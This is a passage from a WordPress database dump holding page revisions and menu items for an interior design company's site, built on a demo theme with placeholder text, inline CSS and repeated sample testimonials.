22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n						Pinterest-p\n											</a>\n					<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n			<h2>Explore</h2>		\n			<ul id=\"menu-menu-explore\"><li id=\"menu-item-44\"><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li id=\"menu-item-45\"><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n<li id=\"menu-item-46\"><a href=\"https://bauhaus.futuremediatrix.com/services/\">Our Services</a></li>\n<li id=\"menu-item-4490\"><a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\">Recent Projects</a></li>\n<li id=\"menu-item-4491\"><a href=\"https://bauhaus.futuremediatrix.com/?page_id=3384\">Shop</a></li>\n</ul>		\n			<h2>Contact</h2>		\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\" target=\"_blank\" rel=\"noopener\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n		© All Copyright 2022 by Ovatheme.com','Footer','','inherit','closed','closed','','103-revision-v1','','','2022-11-14 05:00:51','2022-11-14 05:00:51','',103,'https://bauhaus.futuremediatrix.com/?p=4730',0,'revision','',0),(4731,1,'2022-11-14 05:02:06','2022-11-14 05:02:06','','Home','','publish','closed','closed','','home','','','2022-11-14 05:02:06','2022-11-14 05:02:06','',0,'https://bauhaus.futuremediatrix.com/?p=4731',1,'nav_menu_item','',0),(4732,1,'2022-11-14 05:02:06','2022-11-14 05:02:06',' ','','','publish','closed','closed','','4732','','','2022-11-14 05:02:06','2022-11-14 05:02:06','',0,'https://bauhaus.futuremediatrix.com/?p=4732',2,'nav_menu_item','',0),(4733,1,'2022-11-14 05:02:06','2022-11-14 05:02:06',' ','','','publish','closed','closed','','4733','','','2022-11-14 05:02:06','2022-11-14 05:02:06','',0,'https://bauhaus.futuremediatrix.com/?p=4733',3,'nav_menu_item','',0),(4734,1,'2022-11-25 07:38:19','2022-11-25 07:38:19','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT INTERIOR</h3>\n														<h2>\n								We provide the best\narchitect & interior\ndesign services							</h2>\n		Our signature design process comes standard…refresh, remodel, new and enjoyable design experienceDuis mollis varius quam sed congue. Aliquam porttitor orci ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.		\n			<a href=\"https://demo.ovatheme.com/retirio/about/\" role=\"button\">\n						More Detail\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://demo.ovatheme.com/retirio/service/architecture/\"  title=\"Architecture\">\n	        				<h4>\n					Architecture				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/architecture/\"  title=\"Architecture\">\n		</a>\n		<a href=\"https://demo.ovatheme.com/retirio/service/interior-work/\"  title=\"Interior work\">\n	        				<h4>\n					Interior work				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/interior-work/\"  title=\"Interior work\">\n		</a>\n		<a href=\"https://demo.ovatheme.com/retirio/service/renovation/\"  title=\"Renovation\">\n	        				<h4>\n					Renovation				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/renovation/\"  title=\"Renovation\">\n		</a>\n		<a href=\"https://demo.ovatheme.com/retirio/service/decor-art/\"  title=\"Decor &#038; art\">\n	        				<h4>\n					Decor &#038; art				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/decor-art/\"  title=\"Decor &#038; art\">\n		</a>\n		<p>Trust the experts for all your <strong style=\"color: #242424;\">architects &amp; interior needs.</strong></p>		\n			<a href=\"https://demo.ovatheme.com/retirio/services/\" role=\"button\">\n						More Service\n					</a>\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://demo.ovatheme.com/retirio/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://demo.ovatheme.com/retirio/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://demo.ovatheme.com/retirio/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://demo.ovatheme.com/retirio/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://demo.ovatheme.com/retirio/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://demo.ovatheme.com/retirio/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://demo.ovatheme.com/retirio/is-architecture-a-good-career/\" rel=\"bookmark\" title=\"Is architecture a good career?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-01.jpg\" alt=\" Is architecture a good career?\">\n							</a>\n									23\n									June\n										<a href=\"https://demo.ovatheme.com/retirio/is-architecture-a-good-career/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://demo.ovatheme.com/retirio/is-architecture-a-good-career/\" rel=\"bookmark\" title=\"Is architecture a good career?\">\n								Is architecture a good career?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2022-11-25 07:38:19','2022-11-25 07:38:19','',22,'https://bauhaus.futuremediatrix.com/?p=4734',0,'revision','',0),(4735,1,'2022-11-25 07:38:19','2022-11-25 07:38:19','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT INTERIOR</h3>\n														<h2>\n								We provide the best\narchitect & interior\ndesign services							</h2>\n		Our signature design process comes standard…refresh, remodel, new and enjoyable design experienceDuis mollis varius quam sed congue. Aliquam porttitor orci ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.		\n			<a href=\"https://demo.ovatheme.com/retirio/about/\" role=\"button\">\n						More Detail\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://demo.ovatheme.com/retirio/service/architecture/\"  title=\"Architecture\">\n	        				<h4>\n					Architecture				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/architecture/\"  title=\"Architecture\">\n		</a>\n		<a href=\"https://demo.ovatheme.com/retirio/service/interior-work/\"  title=\"Interior work\">\n	        				<h4>\n					Interior work				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/interior-work/\"  title=\"Interior work\">\n		</a>\n		<a href=\"https://demo.ovatheme.com/retirio/service/renovation/\"  title=\"Renovation\">\n	        				<h4>\n					Renovation				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/renovation/\"  title=\"Renovation\">\n		</a>\n		<a href=\"https://demo.ovatheme.com/retirio/service/decor-art/\"  title=\"Decor &#038; art\">\n	        				<h4>\n					Decor &#038; art				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://demo.ovatheme.com/retirio/service/decor-art/\"  title=\"Decor &#038; art\">\n		</a>\n		<p>Trust the experts for all your <strong style=\"color: #242424;\">architects &amp; interior needs.</strong></p>		\n			<a href=\"https://demo.ovatheme.com/retirio/services/\" role=\"button\">\n						More Service\n					</a>\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n			